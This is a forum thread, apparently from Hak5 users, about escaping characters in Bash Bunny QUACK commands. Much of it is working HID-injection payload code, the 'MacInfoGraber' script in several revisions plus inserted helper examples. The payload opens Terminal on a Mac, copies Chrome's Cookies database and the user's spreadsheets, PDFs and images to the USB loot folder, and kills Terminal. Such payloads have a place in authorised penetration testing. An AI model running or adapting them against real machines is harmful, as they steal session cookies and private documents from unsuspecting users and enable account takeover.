
Mac&Linux ~/ = root


anode


For some reason when I quack a ~/ it is played back as /root/

~/ works fine manually typed in a terminal

I tried simply quacking it into a text editor and got the same result: /root/

Mac OS X 10.9 Mavericks.

Edit: just tried on a Kali laptop, same results.

Both machines are bare metal, not VMs.

Edited by anode

32 minutes ago, LowValueTarget said:

I would imagine that bash is expanding that path on the BB before it's sent as keystrokes. 

Try putting your quack strings in a text file and using `QUACK keystrokes.txt`

Yup, that was it. I saw another post, but it didn't sink in as to why.

Makes sense now. Thanks!


You can also just `\` escape symbols right in the QUACK directive.

QUACK cd $HOME

evaluates to

cd /root

whereas

QUACK cd \$HOME

literally types

cd $HOME

This also goes for the ~, ; and | symbols. Check out what I mean in this practical example - https://github.com/hak5/bashbunny-payloads/pull/36

Edited by audibleblink
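The three ways of getting keystrokes past the Bunny's own shell that this thread discusses (unescaped, backslash-escaped, and a keystroke file) side by side, as an added example that is not code from the original posts or from the hak5 payload repo. payload.txt is a shell script, so the Bunny's shell parses each QUACK line before ducky.py sees it; the stand-in QUACK below only records what it would pass on, so the outcomes can be compared offline. The assumptions are that the real QUACK accepts an absolute path to a keystroke file (the thread only shows `QUACK keystrokes.txt`) and the loot path under /Volumes/BashBunny.

```shell
#!/bin/sh
# Added example, not code from the original thread or the hak5 payload repo.
# payload.txt is a shell script, so every QUACK line is parsed by the Bunny's
# shell first: ~, $HOME, ;, |, &&, > and unquoted spaces are consumed there,
# before the real QUACK/ducky.py ever sees them. This stand-in QUACK only
# records what it would hand to ducky.py. (Assumption: the real QUACK also
# accepts an absolute path to a keystroke file, like `QUACK keystrokes.txt`.)
QUACK() {
    if [ $# -eq 1 ] && [ -f "$1" ]; then
        cat "$1"            # file form: play the Ducky Script file verbatim
    else
        printf '%s\n' "$*"  # inline form: the words that survived shell parsing
    fi
}

# 1. Unescaped: the Bunny's shell expands ~ to its own home, so the Mac
#    receives "cd /root/Documents". HOME is pinned to /root here to mimic
#    the Bunny (inside a subshell, so the caller's HOME is untouched).
quack_unescaped() (
    HOME=/root
    QUACK STRING cd ~/Documents
)

# 2. Unescaped ; : the shell ends the QUACK command there and runs the rest
#    ("true" here, "killall Terminal" in a real payload) on the Bunny, not
#    on the Mac. Only "cd Documents" gets typed.
quack_split() {
    QUACK STRING cd Documents; true
}

# 3. Backslash-escaped, as in the reply above: literal ~, \ , > and ;
#    reach QUACK, so the Mac's shell is the one that interprets them.
#    \\ becomes a single \ so the Mac sees "Application\ Support".
quack_escaped() {
    QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \> /Volumes/BashBunny/loot/MacLoot/chromecookies.db\; killall Terminal
}

# 4. Keystroke file written with a quoted heredoc (<<'EOF'), which turns
#    off all expansion, then played with QUACK <file>. No escaping needed;
#    spaces in paths are fine because STRING takes the rest of the line.
quack_from_file() {
    f=$(mktemp)
    cat >"$f" <<'EOF'
STRING cd ~/Library/Application Support/Google/Chrome/Default/
ENTER
STRING cat Cookies > /Volumes/BashBunny/loot/MacLoot/chromecookies.db
ENTER
EOF
    QUACK "$f"
    rm -f "$f"
}
```

Running `quack_unescaped` reproduces the symptom in the first post (`STRING cd /root/Documents`), `quack_split` shows why an unescaped `;` silently drops the second half of the line, and the other two print the text exactly as the Mac should receive it. The quoted-heredoc form is the least fragile when a payload has many special characters, because nothing in the keystrokes has to be escaped at all.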

cd ENTER works too. I was just playing around with the MacInfoGraber payload by kmakblob, and in order to get it to work I had to change it:

Original:

LED R
ATTACKMODE HID STORAGE
LOOTDIR=/loot/MacLoot
mkdir -p $LOOTDIR
QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 8000
QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/files
QUACK ENTER
QUACK DELAY 500
QUACK STRING cat ~/Library/Application\ Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/$LOOTDIR/chromecookies.db
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cd ~/Documents && cp *.xlsx *.xls *.pdf /Volumes/BashBunny/$LOOTDIR/files/
QUACK ENTER
QUACK DELAY 1000
QUACK GUI q
QUACK DELAY 500
QUACK ENTER

# Green LED for finished
LED G

files=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xls 2> /dev/null | wc -l)
files2=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xlsx 2> /dev/null | wc -l)
if [ "$files" != "0" -o "$files2" != "0" ]
then
# Got spreadsheet files
LED R B
else
LED R
# No spread sheets
fi

Post fiddles: I had to escape spaces, and even escape the backslash that escapes the space, as well as other special characters to get it to work. I didn't try escaping ~.

LED R G 100
ATTACKMODE HID STORAGE
LOOTDIR=loot/MacLoot
mkdir -p $LOOTDIR
QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 1000
QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/files
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cd
QUACK ENTER
QUACK STRING cd Library/Application\\ Support/Google/Chrome/Default/
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cat Cookies \> /Volumes/BashBunny/$LOOTDIR/chromecookies.db
QUACK DELAY 1000
QUACK ENTER
QUACK STRING cd
QUACK ENTER
QUACK DELAY 1000
QUACK ENTER
QUACK STRING cd Documents
QUACK ENTER 
QUACK STRING cp *.xlsx *.xls *.pdf *.jpg /Volumes/BashBunny/$LOOTDIR/files/
#QUACK STRING cp -R Documents/ /Volumes/BashBunny/$LOOTDIR/files/
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cd
#QUACK GUI q
QUACK DELAY 2000
QUACK ENTER

# Green LED for finished
LED G

files=$(ls /Volumes/BashBunny/loot/MacLoot/files/ |grep -v / | wc -l)
QUACK STRING $files
if [ "$files" != "0" ]
then
# Got files
LED G
else
LED R
# No files
fi

Submitted a PR to fix in mainline. - https://github.com/hak5/bashbunny-payloads/issues/51

Basic changes:

  - fixes lootdir path
  - don't capitalize var names that aren't exported
  - indentation
  - escape shell characters that are passed to QUACK
  - account for variable copy times by joining cp and exit commands
  - sync the disk

 

LED G R
ATTACKMODE HID STORAGE

lootdir=loot/MacLoot
mkdir -p /root/udisk/$lootdir

QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 5000
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/xlsx
QUACK ENTER
QUACK DELAY 500
QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \> /Volumes/BashBunny/$lootdir/chromecookies.db
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cp \~/Documents/{*.xlsx,*.xls,*.pdf} /Volumes/BashBunny/$lootdir/xlsx/\; killall Terminal
QUACK ENTER

# Sync filesystem
sync

# Green LED for finished
LED G

 

Edited by audibleblink

Wow, this is almost identical to the changes I have been making since my last comment. Awesome (high five).

Is the lack of sync why I was never getting a success? If sync fixes this, it might be nice to add back in the logic for the LED at the end indicating whether the files were found/copied.

Edited by Onus

Just now, audibleblink said:

It's still in the GitHub code, I only pasted the changes here.

I gathered that. I mean the old file didn't sync the file system and the LED always went red even when there were files. Would this fix that?


I just tried removing the kill terminal command so that I can use the terminal to log $files, and editing your script above to look like this after the sync call:

# Sync filesystem
sync

files=$(ls /Volumes/BashBunny/loot/MacLoot/files/ |grep -v / | wc -l)
QUACK STRING $files
QUACK ENTER
if [ "$files" != "0" ]
then
# Got files
LED G
else
LED R
# No files
fi

I am perplexed why $files keeps reading as 0 even though I have copied 16 files. If I run the same line in the terminal myself:

ls /Volumes/BashBunny/loot/MacLoot/files/ |grep -v / | wc -l 

I get 16, but the script keeps returning 0.

It's stupid bells and whistles, but damn it, I want to know.

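A Bunny-side file count and LED check for the end of the payload, as an added example that is not code from the thread or from the hak5 payload repo. Everything in payload.txt runs on the Bunny, where the exported storage is /root/udisk (the PR above does its mkdir there); /Volumes/BashBunny/... is the Mac's mount point and does not exist on the Bunny, so listing it from the payload counts nothing. The loot directory name is assumed to match the payload's lootdir.

```shell
#!/bin/sh
# Added example, not from the thread or the hak5 payload repo. Everything in
# payload.txt runs on the Bunny, where the exported storage is /root/udisk
# (the PR above does its mkdir there); /Volumes/BashBunny/... is the Mac's
# mount point and does not exist on the Bunny, so any ls there counts 0.
# The loot path in the usage comment is an assumption matching the payload.

# Count regular files directly inside a directory. Handles spaces in names,
# ignores subdirectories, never parses ls, and yields 0 (not an error) for a
# directory that does not exist.
count_loot_files() {
    dir=$1
    [ -d "$dir" ] || { echo 0; return 0; }
    find "$dir" -maxdepth 1 -type f | wc -l | tr -d ' '
}

# LED colour for the end of the payload: G when loot arrived, R otherwise.
# The test is quoted and spaced so [ never sees a stray "0]" token.
loot_led() {
    if [ "$(count_loot_files "$1")" -gt 0 ]; then
        echo G
    else
        echo R
    fi
}

# In payload.txt, after the host-side cp has finished and the disk is synced:
#   sync
#   LED "$(loot_led /root/udisk/loot/MacLoot/files)"
```

The missing space before `]` in the `if` lines posted above makes `[` fail with "missing ']'", which takes the else branch every time; quoting the expansion and spacing the bracket avoids that regardless of what the count is.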

I'm wondering if the /tools/ducky.py (which is called by QUACK) is running in a subshell. If the QUACK commands run async, then the script is running in its entirety before ever finishing the HID section of the payload.

Just a hypothesis, this is where my bash knowledge reaches its limits.

